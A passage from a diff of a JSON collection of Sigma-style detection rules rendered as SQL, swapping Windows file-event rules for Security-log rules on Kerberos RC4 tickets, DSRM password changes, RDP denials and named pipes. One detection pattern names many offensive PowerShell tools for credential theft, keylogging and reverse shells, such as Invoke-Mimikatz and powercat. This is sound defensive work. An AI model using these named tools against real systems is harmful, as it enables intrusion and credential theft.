'%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_mal_adwind.yml" + 
"filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unlikely" + "Initial installation of a domain controller" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": 
"file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local User Creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "status": "test", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "author": "Patrick Bareiss", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_user_creation.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral 
movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, 
vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Go utilities that use staaldraad awesome NTLM library" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT 